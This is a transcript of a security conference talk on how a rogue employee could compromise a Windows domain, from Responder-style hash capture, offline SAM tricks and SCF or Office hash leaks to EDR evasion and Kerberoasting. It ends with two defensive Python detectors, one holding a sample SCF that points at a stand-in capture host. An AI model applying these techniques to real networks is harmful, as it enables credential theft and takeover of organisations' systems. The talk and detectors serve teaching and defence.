
I made this for BSides Leeds. Chapter 1. OK: in 2014 a UK employee, using Tor, posted the names, addresses, bank account details, National Insurance numbers and salaries of more than a hundred thousand employees online, police said. As an internal auditor the accused had access to sensitive information. At his criminal trial he was jailed for eight years. Right, what creates a rogue employee or a disgruntled employee? I think you've probably heard all of this before, but it's employees that feel they're not required, they feel undervalued, frustrated at being in a position for a long time, not listened to, and just generally annoyed and angry at the company, or severe mental health issues. I was interested in what was, in this case, the sort of proven defining point of guilt. I wanted to know why they concluded that. Now, I couldn't find much information. I suspect they found his laptop with all the details on it, including Tor, and they decided that was enough. I'm hoping the case wasn't based on domain authentication, because I have a lot of theories on domain authentication not being particularly secure and how pretty much anyone working in an environment with a domain can compromise anyone's credentials.

OK, so for this talk I started with a host, a Windows 10 host, which I think replicates a lot of environments today. Windows 7 is obviously end-of-life now, so we should start seeing people going to Windows 10. I wanted AV on the box, so I used Defender, and I was interested to know what a standard user could just do on a domain. So I started with Inveigh. Now Inveigh, if people don't know, is the PowerShell equivalent of Responder. If you're not sure what Responder is, it's a tool that allows you to respond to broadcasts on a network; it doesn't have to be just broadcasts, it can be any network traffic, and what happens when it sees the broadcast is it responds and says "can you send me your authentication?", so you can get the username, the password hash and the machine name or the domain name. You can take those hashes offline and you can reverse them. So if you're interested in downloading Inveigh, that's the address for it. Now, to run it, all the user has to do is fire up PowerShell, type Import-Module Inveigh to import it, and then run it; that's all they have to do, and that's what you can see now. Some of you might notice that it says "Administrator". A standard user wouldn't have local admin rights or domain admin rights, but I'll get to that later. When they run it without, they will see this: it's a warning telling you that you're running it without elevated privileges, so a standard user will get that. Now I was interested to know: when Inveigh first came out people said that it's like Responder but it doesn't have to be run as a local admin, and I was always very, very interested in this, and I've used it on quite a few tests myself, really, as a standard user. What I found is it's 50/50. Responder will quite often snag you some hashes; Inveigh run as a standard user generally doesn't, but it can under the right circumstances. Now this is what happens when you run it: it will start the DNS spoofer, the LLMNR spoofer, the NBNS spoofer and also the HTTP spoofer and capture. That's the important one: if you're on a domain or on a network and someone starts sending broadcast HTTP traffic, it will respond to that and also say "send me your credentials", and that's what you'll get back: the username, which is there, and the password hash, which you can see there, and you also get the domain name or the computer name. That can obviously be taken offline and reversed. Now what you really want to be able to do, though, is run it with elevated or local administrative privileges. Now I know a lot of you'll be thinking "these are standard users, so how can a standard user on your domain become local admin?" And of course I'm going to talk to you about that: ring the helpdesk and ask them. They'll probably do it; in loads of environments I've actually done that and they did do it for me, so it does happen.

Right, I wanted to start off basic, so I looked at sticky keys. Now if anyone's not aware of what sticky keys is here, I don't have time to chat about it, but it's probably one of the oldest exploits in Windows, and it allows a standard user to take the sethc application and rename it. Now, how you do it: you'd have to mount the C drive not as a logged-in Windows user; you'd have to do something like Kali or, back in the day, BackTrack, and you then log in, mount the C drive, and you replace that sethc, you rename it to anything, and then you rename cmd to sethc, and then you reboot the machine and you hit the shift key like six or seven times and it will start a cmd session, as a local admin, before you've even logged in, and what you then do is add yourself as a local administrator. That's a really, really, really old exploit. So, doing this recently in my lab at home, I discovered, I believe (I haven't confirmed this yet), that Defender now spots what you've done and renames it, puts it back. Now I did speak somewhat about this internally at work and said "I think it does this, I will get around to testing it", but like I said it's not a problem, because what you do is you start Windows in Safe Mode so Defender doesn't have a chance to kick in, so you could still do it. So even today that would still possibly be the easiest way of making yourself a local admin. But a lot of you people should be thinking: what first? I'm going to discuss how you go about doing it. So here you are with a Windows machine and I'm booting off the USB drive, so what you do is you go to the boot options and you select removable devices or USB or whatever they call it, and it boots Kali. Now an alternative to sticky keys would be this, where you copy the SAM, the SECURITY and the SYSTEM files. What this gives you is a copy of the local computer hashes, which you can instantly collect: the local administrative account hashes. You don't have to reverse them, because, as I've discussed plenty of times before in talks, Microsoft will accept the hash as authentication, and using certain tools you can do what they call pass-the-hash and authenticate to boxes without actually reversing the password hash. But alternatively, as you'll see, a lot of domains today have LAPS, which means every individual machine no longer has the same administrative account password, so you can no longer pass the hash in an environment that uses LAPS. But what you also find with this, and I only rediscovered this recently, is it also collects the cached credentials, and these are domain credentials, so from just doing this alone you can possibly get lucky and actually get a domain administrator's cached credentials right on the box. Alternatively, built into Kali (which came again from BackTrack) is chntpw (change password). Now this would allow the user to simply go onto the account they wished and delete the password. What you can also do with this is, at this point, elevate any account you like to a local administrator as well. And that's how you run it: you do chntpw, the user option followed by the user you want, and the location of the SAM file, and that's what it looks like, and bang, done. So at this point I've just discussed about four different ways of becoming a local administrator on the box. Now this is me logging in with no password, because I've just deleted it, and then the first thing I do is go straight to Computer Management and I add a password, purely for my own amusement, because I can.

Now, what a lot of you will be thinking is "what's he going on about?", because firstly the boot order and the BIOS are going to be locked. Well, yes, in a good environment you'd expect that, especially on laptops. Secondly, what you could be thinking is, and correctly, we've got BitLocker or you've got encryption on the drive, so these cold boot attacks won't work. Yes. Now what I discovered is that pretty much every environment now, people correctly encrypt their laptop hard drives, but I'd say even 50 percent, probably more, of people forget about the desktop machines, and I wanted to look into the reasons why they have done this. Now the conclusion I came up with, came up with yesterday while thinking about this more, is that laptops you give to an individual user, so you give them a BitLocker key. Now if you have it in a shared environment, like a desktop where multiple people might use it, you can't obviously, in a great little security environment, hand out that BitLocker key; you'd probably also have to hand that BitLocker key to multiple people. Now Microsoft does have a solution around this, but it's quite a task to implement and involves certificates and a server, and what happens is when that desktop boots up it automatically, in essence, puts in the BitLocker key for you and drops you directly into a domain prompt. But I've not yet seen an enterprise that's done this myself, and all the findings generally are that they don't BitLocker the hard drives on the desktops. So if I was a user in an environment and I was disgruntled and I found that my laptop was encrypted, I'd just go to the desktop in the corner. And for anyone who thinks "well, that's not very likely": on loads of social engineering jobs I've done, where I've walked into a site, I've just walked up to machines as a last resort and done things like this, even to the point where the BIOS has been locked: I've opened up a PC in the middle of an office and changed the boot order on the motherboard and then restarted the machine just to bypass the BIOS lock. So this is all very easy to do.

Now if all that fails you have to go back to more traditional privesc-esque approaches. I don't want to talk too much about privesc; I don't have much time and lots of people have better privesc than me, but I definitely have some things I do really like to do. This is one of them, built into Windows: findstr. It's amazing. Basically you run findstr and you say what keywords you want (here I've done "password") and you say which sort of documents you'd be interested in looking through, and it will then go off and search those documents for that defined word. And what I like to do is show people. So here I am as a standard user. Sorry, you can't see it very well here, but what I've done is I've mounted the DC. Now a standard user, by default in an average domain, normally has access to the DC, so I've mounted that and I'm running findstr, hit go, and there we go: it's instantly found a file called notes.txt, and looking inside it there's a username called Jimmy Gob and one is the password. Now some people will be thinking "that's unlikely". Generally when I do an offensive engagement, the first moment I get credentials, while they've started having a sniffer on the network, I'll go to the DC, I'll do searches for files with keywords in, and really commonly I find accounts, and quite often they're even domain admins or local admins. So I think that's a possible move, and any standard user can do that. Right, you can also then go into more traditional approaches of looking for missing patches on devices, and there's a one-liner that will directly show you all the patches that are on there. You can take that off there and you can see if there are exploits that correlate to any of the missing patches. That's a bit messier, but I don't think that's a capture-the-flag situation; you can do it.

So we're finally running as administrator, or local administrator, on the device and we run Inveigh again. So what's different? We've finally got the immortal, the one I love: the SMB capture. So SMB traffic, I should explain, broadcast on the network is very common; pretty much that's how Windows file sharing works. So if you have a statically defined share (this is my Z drive, or O drive, or an F drive) on the machine, when you first log in, Windows will try and access that and it'll make an SMB request out. Now if you're sitting there with Inveigh or Responder, you'll go "yep, I'm here, send me your credentials", and you get hashes. But let's make this better, because in Windows 10 I'm starting to notice they're getting less chatty, and I'm sort of noticing, when you're plugging in, or you're compromising a box and running Inveigh on it remotely, you just see less traffic generally. So my colleague, a friend of mine, about two years ago released a blog post on our blog about SCF files. Now this is an SCF. What it is, is you point a simple request into it: as you can see, there is the IP address of your Inveigh or your Responder box, and you name it so that it's at the very top of the share. Now, every time any Windows machine browses to that share, Windows will automatically see that SCF and trigger, and it will trigger an SMB request; the user won't be prompted or even know, it'll send the hashes back to your Responder or Inveigh. So whenever we do an engagement we always lay around SCF files (obviously clean them up afterwards), but during an engagement you do it and all of a sudden you're back to raining hashes. So when it fails, and it always does fail, on pretty much every test now. I've discussed, throughout the years, many ways of snagging credentials, and I've generally always talked about them as SMB, so I'm very into, sort of, you know, injecting SMB into emails and into the index files of websites so it just triggers automatically when you browse.
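The SCF trick just described, seen from the defender's side, as an added example that is not code from the talk: a small Python scanner that parses the SCF format and flags any file whose [Shell] IconFile= line points at a UNC path. The share paths, host address and file contents are constructed for the example.

```python
"""Scan share contents for SCF files whose icon points at a remote host.

Added example, not from the talk: an SCF placed on a share makes every client
that browses the folder authenticate over SMB to whatever host its IconFile=
line names, which is the trick described above. Walking a share for such files
is a cheap blue-team check. Paths, host address and contents are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# A UNC icon path (\\host\share\...) is the tell; a local icon path is benign.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-style SCF format: [Section] headers then key=value lines.
    Section and key names are lower-cased so lookups are case-insensitive."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def scf_remote_icon_host(text: str) -> Optional[str]:
    """Return the host named by [Shell] IconFile= if it is a UNC path, else None."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    m = UNC_RE.match(icon)
    return m.group(1) if m else None


def scan_share(files: Dict[str, str]) -> List[Tuple[str, str]]:
    """files maps a share path to its content (as a directory walk would
    produce). Returns (path, remote_host) for every SCF with a UNC icon."""
    findings = []
    for path, content in files.items():
        if not path.lower().endswith(".scf"):
            continue
        host = scf_remote_icon_host(content)
        if host:
            findings.append((path, host))
    return findings


# Constructed sample share: one planted SCF (named to sort to the top of the
# folder), one legitimate "Show Desktop" SCF, and an unrelated text file.
SAMPLE_SHARE = {
    r"\\fileserver\public\@readme.scf": (
        "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.0.0.99\\share\\icon.ico\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    ),
    r"\\fileserver\public\Show Desktop.scf": (
        "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    ),
    r"\\fileserver\public\notes.txt": "not an scf",
}

if __name__ == "__main__":
    for path, host in scan_share(SAMPLE_SHARE):
        print(f"ALERT: {path} points IconFile at remote host {host}")
```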
I'm pretty much interested in shoving SMB absolutely everywhere. So yeah, we can do it. I want to give you a quick example of how I do an SMB exploit. Now I'm very interested, and I'll get onto it a little bit later as well, in error messages and general prompts that you get. So that's an Office 365 prompt I got in Excel recently, and it's basically saying "can you verify your subscription?" So instantly I thought, I'll take that, fake it with Responder, drop it into Excel, and let's exploit this. So when you click it now, it no longer does what it says; what it does is ultimately send me a hash over SMB. So what did I do there, what was the magic? I took a message that was legitimate, I copied it, I put it into MS Paint, I made it the right size and dropped it into Excel, made that a hyperlink and put it as an SMB request. Very quick notes on Office: I've noticed Excel allows you to instantly click the hyperlink without any prompt asking for anything, you just click it and it will automatically trigger; Word, you need to do Ctrl+click; and PowerPoint needs to be in presenter mode for a hyperlink to work. So I like to know these sorts of things, I want to test, because if I'm going to send something into a target I like to know that it'll just trigger without any prompt, or with as little prompt as possible.

So some of you'll be thinking "stop talking about SMB", and you're right. Firewalls: even five years ago no one had any outbound firewall rules really at all, which was nice to go against, but today people are starting to, not everyone, but people have started to filter the outbound traffic as well, so SMB is now filtered outbound as well, so if you send this in to someone it just slams against their firewall. Now about four or five years ago I did a talk and I said "let's just, you know, change our SMB and make it HTTP, because most people aren't going to block HTTP outbound", and I got on stage and someone said to me "that just doesn't work", so it was a bit of an embarrassing talk I did. But the key reason it didn't work was because when you do it over HTTP you get a prompt. Now you could argue it does work, because if you replace the SMB with HTTP, on a Windows machine they get a prompt for credentials, they put the credentials in and you get the hashes back, but you could argue "well, that's just a credential harvester", at which point you might as well have just cloned a website, and I agree with that. So I never really used this on real engagements, but it was always a fallback. But I was interested; for a few years I've been thinking about what if you could do it without a prompt. Well, you can, and I've released some ghetto code on my GitHub page. My exploit, as it is, is a bash script and it takes your Word document, your clean Word document (apologies to everyone here, you should be able to see it later on YouTube if everyone's interested), and all you have to do is add your IP address, and you'll see what it does in a minute. So here I'm adding my IP address to it and I'm going to run the script, and what it does is it prompts you for the location of your Word document, your clean Word document, that you want to use as your template, and that could be anything. It unzips it, then it injects all of that code there, which you can see yourself if you have a look at it, and then it zips it back up and saves it as a docx, which is what it's done there. So you've seen it: it's unzipped it, it's added it, and it's re-zipped it as a docx. So now it's just a case of taking the file called dirty and moving it over to your target. Right, at this point I'm going to fire up Responder, and here we are back on the target machine: they've received that, they've downloaded it from some site and they're opening it, and there you go, we've got a hash. So if you're on a bare Windows box here (that prompt there is because I'm using a trial copy of Windows), what you see there is no prompt for credentials; no credentials have been put in manually, it's just automatically sending the credentials, and Responder is set up for it as an HTTP request. So finally, where SMB was blocked and I had to find a way back in, I can get past firewalls again.

Now I did discuss earlier the fact that I love error messages, so here's a little bit basic, but I want to show you. So, using Cobalt Strike as a C2, we go here to the Windows target and we open up this. Now what this is here, it's saying that the PowerPoint document has basically corrupted, you need to re-download it. So I've changed that to an HTA, and when they go to re-download it, they see nothing. Now what I would do, if I was using this on an engagement, I'd have made that screen a little bit nicer and I'd have learned how to redirect to a legitimate PowerPoint document, so they'd have just seen nothing; they'd have clicked it and got a PowerPoint document, they'd have felt that was correct. What we've got here though, as you can see, is our first connection, so we now control that machine remotely.

Right, the big bad wolf. So generally from an insider's malicious point of view, and also from a red team engagement, it's getting harder, and I didn't think it really was until it really hit me, probably about a year ago: it's getting a lot harder, EDR is starting to kill everything. Now if you're not aware of what EDR is, this is what EDR is: it's a software agent installed on the host system. If you're interested in reading about EDR, here's one such product you can read about. Now the basics of EDR: anything abnormal, EDR will alert on. Here's a screenshot of an example of a central solution which takes alerts in. Now the only saving grace presently, from a red team perspective, is that during a seven-day period that's got 494,000 alerts going into it. Four hundred and ninety-four thousand alerts are going into it over a seven-day period, and apparently it's down sixty-two thousand on what it was the week before, so obviously they've done some tuning, but they've still got thousands and thousands and thousands of alerts. Now presently we can just sort of sneak in amongst it, but running cmd, running PowerShell, it all alerts. "PowerShell is dead", a lot of people are saying out there; what I'd say is it's not completely dead yet, but in more mature environments you just can't use it really any more. And OK, this is a weird one: I did a test recently, quite a tricky test, against an EDR solution, and I'm not kidding, just firing up mspaint actually did trigger an alert. I have no idea why, but it did. But I kind of came to this conclusion about EDR at the moment within some environments (a lot of you might disagree), but I think basically if the wind blows or the sun shines on a laptop, if someone puts a kettle on, there's a good chance EDR's probably going to trigger. That is what I say EDR is. So we caused this: in essence we started to use tools that are generally used by SOCs and blue teams, and we used them against them. We started to use PowerShell, we started to use living off the land, we started to use all these kinds of tools they've been using for a long time. It's not surprising that, firstly, they're going to possibly be annoyed, but also they're going to figure out ways of defending against it very, very rapidly. Now presently, as it stands, EDR solutions cause so much noise, as I said earlier, that we can still sneak past, but it's getting really, really hard, which is a positive thing.

So, as I always like to end, a very quick overview: how do you get around EDR? So firstly, I like to do this on a test: I avoid it like the plague, I'll generally stay away from it if I can. This is how I consider EDR. I'm now going to go to this, which surprised people, because a lot of people think of where we would attack normally: we'd go straight for the users, and people say, incorrectly, "the weakest link" and all that, which I've said for years is wrong. But now we won't go for that; we'll generally go straight to the servers, because what I've found is, in some environments, not all, they'll stick EDR, their advanced sort of solutions, on all the laptops, all the desktops, everywhere the users touch, but they're generally a bit afraid to stick it on their servers. This could be because they don't want to interfere with what it does, they don't want to potentially risk slowing it down, I don't know, but I find that generally they're less protected. So I started thinking, can I make a quick slide just to portray roughly how I see server land compared to desktop land, where we used to attack? This is it. So there's your desktop land, the desktops, which we avoid like the plague, and that's what server land looks like. So how do we go from foothold to server land? Well, there's lots of ways to do this. Basically, if you have credentials and you don't want to trigger EDR, possibly the best way to do it, I find, is to use your own machine. But obviously you can't do that from a remote perspective, but if you have compromised someone's machine, probably try and escalate to local admin rights as soon as you can, and then install some sort of virtualisation on the machine, and then run a Windows image inside of that, and then add that to the domain. So any standard user, by default (I've said this many times before), can add up to 10 machines to a Windows domain, and they can't take them off a domain, which makes sense, because it could take your DCs off, but the reality is it's dangerous. I'm saying here a standard user is adding a machine to a domain. So why would you want to do this? Well, you've got a machine on their network that we can use to completely map out their network and exploit, with nothing on it at all: no protection, no AV, no EDR solution, absolutely nothing. We can go back to using any tool we like; you can make as much noise on this machine as you like, enumeration. The only way they will spot us then is when we're starting to write to the other machines; that's the noisy way of doing it. Now a lot of you will be thinking, and yes, you'd be right to be thinking that, adding a machine to the domain is likely to trigger an alert. Yes, but as I discussed earlier, if someone's getting seventy to a hundred thousand alerts a day, a week, sorry, they may not be spotting stuff like this, adding machines. I've done quite a few tests and I've found people haven't generally spotted it.

So right, I want to leave you with this high note, so we'd like to end on a positive. So here we have a kiosk environment, which a lot of environments use. Kiosk environments generally give you access to IE, so this is a replication of a job I did recently. So the first thing we do is browse to our own site. Now this, I'm using my lab environment to replicate it, obviously, to a 192 address instead of a real one, but at this point they download a copy of a bat file which starts up FTP. Now cmd was hidden; it wasn't hidden very well, as we're about to see here. So by starting FTP, then trying to fire up cmd, and boom, there we go, so we have instant access to cmd on this kiosk machine. Now from that point I want to get straight to PowerShell, so simply type powershell and we go straight into PowerShell. So what am I going to do now? We drop a PowerShell one-liner in, and here I'm doing what's called Kerberoasting. Now Kerberoasting, any standard domain user can do it: it makes a request to the domain controller, it asks the domain controller for a copy of all the service accounts with the correlating password hashes. Service accounts can typically belong to an administrative group, if not the Domain Administrators group, and secondly, and thirdly, fourthly, fifthly, lastly, their passwords are generally weak, so you generally find something like the password is just the username. And the reason for this is because service accounts have commonly been set up at the very start of the domain being built and they're set to never expire their passwords; they've never thought about changing them. So just from accessing the kiosk, four minutes later we're a domain admin. So there we go. I'm just going to very quickly show you my lab at home. Right, I'm with Pen Test Partners and I'm exploit 2600 on Twitter. Thank you very much. [Applause]
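Kerberoasting, as described at the end of the talk, from the detection side; this is an added example and not the speaker's code or tooling. It reads constructed, simplified event 4769 records (the field names follow the Windows event, while the key=value layout, account names and service names are assumptions) and flags an account that pulls RC4 service tickets for many distinct services within a few minutes.

```python
"""Flag Kerberoasting-style bursts in Windows Security event 4769 records.

Added example, not from the talk: the Kerberoast request shows up on the
domain controller as many TGS requests (event 4769) for distinct service
accounts from one user in a short window, usually with the RC4 encryption
type (0x17) that cracking tools prefer. The records below are constructed
in a simplified key=value form for this example, not real exported events.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

RC4_HMAC = "0x17"          # TicketEncryptionType value for RC4-HMAC tickets
WINDOW = timedelta(minutes=5)
MIN_DISTINCT_SERVICES = 5  # a person rarely needs 5+ different SPN tickets in 5 min


def parse_4769(line: str) -> Dict[str, str]:
    """Parse one constructed 'key=value key=value ...' 4769 record."""
    fields: Dict[str, str] = {}
    for token in line.split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def kerberoast_suspects(lines: List[str]) -> Dict[str, List[str]]:
    """Return {account: [service names]} for each account that requested RC4
    tickets for MIN_DISTINCT_SERVICES or more distinct services inside WINDOW."""
    requests: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for line in lines:
        ev = parse_4769(line)
        if ev.get("EventID") != "4769" or ev.get("TicketEncryptionType") != RC4_HMAC:
            continue  # not a TGS request, or AES-only: not the roasting pattern
        when = datetime.fromisoformat(ev["Time"])
        requests[ev["TargetUserName"]].append((when, ev["ServiceName"]))
    suspects: Dict[str, List[str]] = {}
    for account, reqs in requests.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            # sliding window starting at each request; count distinct services
            services = {svc for when, svc in reqs[i:] if when - start <= WINDOW}
            if len(services) >= MIN_DISTINCT_SERVICES:
                suspects[account] = sorted(services)
                break
    return suspects


# Constructed sample: a kiosk user burst-requesting RC4 tickets, an ordinary
# user with an AES ticket, and a user with only two RC4 tickets (not flagged).
SAMPLE_4769 = [
    "EventID=4769 Time=2020-01-20T09:00:01 TargetUserName=kiosk01@LAB.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17",
    "EventID=4769 Time=2020-01-20T09:00:02 TargetUserName=kiosk01@LAB.LOCAL ServiceName=svc_web TicketEncryptionType=0x17",
    "EventID=4769 Time=2020-01-20T09:00:02 TargetUserName=kiosk01@LAB.LOCAL ServiceName=svc_iis TicketEncryptionType=0x17",
    "EventID=4769 Time=2020-01-20T09:00:03 TargetUserName=kiosk01@LAB.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17",
    "EventID=4769 Time=2020-01-20T09:00:04 TargetUserName=kiosk01@LAB.LOCAL ServiceName=svc_sccm TicketEncryptionType=0x17",
    "EventID=4769 Time=2020-01-20T09:00:05 TargetUserName=kiosk01@LAB.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17",
    "EventID=4769 Time=2020-01-20T09:12:00 TargetUserName=jsmith@LAB.LOCAL ServiceName=svc_web TicketEncryptionType=0x12",
    "EventID=4769 Time=2020-01-20T10:00:00 TargetUserName=bjones@LAB.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17",
    "EventID=4769 Time=2020-01-20T10:00:30 TargetUserName=bjones@LAB.LOCAL ServiceName=svc_iis TicketEncryptionType=0x17",
]

if __name__ == "__main__":
    for account, services in kerberoast_suspects(SAMPLE_4769).items():
        print(f"ALERT: {account} requested RC4 tickets for {len(services)} services: {services}")
```

Pairing this with an audit of which service accounts still have never-expiring passwords, as the talk describes, tells you which of those tickets were actually worth cracking.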